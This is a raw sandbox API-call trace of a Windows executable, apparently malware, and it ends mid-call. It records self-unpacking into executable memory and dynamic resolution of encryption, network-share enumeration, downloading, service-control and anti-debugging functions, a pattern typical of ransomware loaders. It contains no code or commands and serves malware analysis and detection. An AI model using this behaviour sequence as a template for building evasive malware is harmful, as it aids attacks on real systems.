[0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0045.484] GetTickCount () returned 0x1146401 [0049.923] lstrcatA (in: lpString1="", lpString2="WirtualProtect" | out: lpString1="WirtualProtect") returned="WirtualProtect" [0049.923] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0049.923] VirtualProtect (in: lpAddress=0x4870020, dwSize=0x90d68, flNewProtect=0x40, lpflOldProtect=0x18f614 | out: lpflOldProtect=0x18f614*=0x4) returned 1 [0050.002] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0050.003] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0050.003] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0050.006] Module32First (hSnapshot=0x58, lpme=0x18f3a8) returned 1 [0050.008] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x4910000 [0050.062] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0050.062] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0050.062] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0050.062] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0050.062] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0050.062] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0050.062] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0050.063] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0050.063] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0050.063] SetErrorMode (uMode=0x400) returned 0x0 [0050.063] SetErrorMode (uMode=0x0) returned 0x400 [0050.063] GetVersionExA (in: lpVersionInformation=0x18e2d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e2d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0050.063] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x4a30000 [0050.083] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f360 | out: lpflOldProtect=0x18f360*=0x2) returned 1 [0050.195] VirtualFree (lpAddress=0x4a30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.196] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0050.196] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0050.196] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0050.196] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0050.196] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0050.196] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0050.196] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0050.539] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0050.539] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0050.539] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0050.539] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0055.807] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0055.807] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0056.099] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0056.099] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0056.099] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0056.099] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0056.099] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0056.099] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0056.099] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0056.100] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0056.100] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0056.100] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0056.100] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0056.101] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0056.102] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0056.103] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0056.104] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0056.105] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0056.106] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0056.107] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0056.108] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0056.109] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0056.110] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0056.111] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0056.112] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0056.112] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0056.113] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0056.114] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0056.114] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0056.114] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0056.114] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0056.115] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0056.116] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0056.116] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0058.644] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0058.645] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0058.645] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0058.645] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0058.645] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0058.645] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0058.645] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0058.645] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0058.645] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0058.645] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0058.645] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0058.645] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0058.646] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0058.646] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0059.091] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0059.091] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0059.398] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0059.399] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0059.399] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0059.399] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0059.681] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0059.681] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0059.681] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0059.681] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0059.682] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0059.682] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0059.682] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0059.682] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0059.682] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0059.682] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0059.682] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0059.683] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0059.683] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0059.683] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0059.683] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0059.683] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0060.413] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 [0060.413] atexit (param_1=0x4910920) returned 0 [0060.414] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f370 | out: lpSystemTimeAsFileTime=0x18f370*(dwLowDateTime=0x3a776af0, dwHighDateTime=0x1d6bf06)) [0060.414] GetCurrentThreadId () returned 0x618 [0060.414] GetCurrentProcessId () returned 0xa14 [0060.414] QueryPerformanceCounter (in: lpPerformanceCount=0x18f368 | out: lpPerformanceCount=0x18f368*=18067847323) returned 1 [0060.414] GetStartupInfoW (in: lpStartupInfo=0x18f300 | out: lpStartupInfo=0x18f300*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0060.414] GetProcessHeap () 